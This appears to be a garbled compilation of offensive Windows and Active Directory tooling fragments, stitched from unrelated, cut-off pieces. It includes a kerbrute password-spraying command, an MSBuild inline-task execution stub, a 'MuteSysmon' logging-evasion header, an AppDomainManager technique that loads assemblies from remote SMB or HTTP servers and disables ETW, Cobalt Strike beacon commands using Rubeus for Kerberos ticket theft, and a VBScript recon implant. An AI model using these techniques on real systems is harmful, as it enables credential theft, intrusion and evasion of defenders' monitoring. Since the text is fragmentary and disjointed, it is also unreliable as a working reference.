With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#DISCLAIMER
#I'm not the original author of the script...
#Original git repo vanished
function String-to-ByteArray ($String)
{
$ByteArray=@()
For ( $i = 0; $i -lt ($String.Length/2); $i++ )
{
$Chars=$String.Substring($i*2,2)
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
<Target Name="Hello" >
<!-- Call ANY .NET API -->
<!--
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@echo off
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM °² Enumerates all files extensions ²°
REM °² and what opens them on Windows 10 in batch/cmd ²°
REM °² twitter: @ollieatnccgroup ²°
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²°
REM ------------------------------------------------------
REM
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
namespace MuteSysmon
{
class Program
This is a variation of the technique originally discovered by subtee
and described here
TL;DR It essentially allows you to turn any .NET application into a lolbin by providing a configuration file and specifying the <appDomainManagerAssembly>
element pointing to a specially crafted .NET assembly which executes when the application is loaded.
This variation allows you to load the AppDomainManager assembly from a UNC path or HTTP(s) server. Also disables ETW thanks to the <etwEnable> element :)
C:\Test. Let's use aspnet_compiler.exe as an example.
test.cs to test.dll with a signed strong name; this is required to load an assembly outside of a .NET application's base directory.
test.dll on a remote SMB or HTTP(S) server
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
Dim dnsname
dnsname= "canary.troubleshootdomain.com"
Set wmi = GetObject("winmgmts:")
Set response = wmi.ExecQuery("Select * from Win32_PingStatus WHERE address='" & dnsname & "'")
'' Griffon main actions start here.
Set file_system_object = CreateObject("Scripting.FileSystemObject")
temp_file_name = file_system_object.GetSpecialFolder(2) & "\" & file_system_object.GetTempName
' Start the detailed recon.
recon_info_str = get_network_adapter_info
network_info_str = ""
recon_info_str = recon_info_str & "SystemInfo" & "=" & get_system_info() & "&"
recon_info_str = recon_info_str & "SoftwareInfo" & "=" & get_product_or_process_info("Win32_Product") & "&"
1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: This "Serves" Shellcode in a memory mapped file.
This is not accessible to other processes.
Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
I leave this for you to explore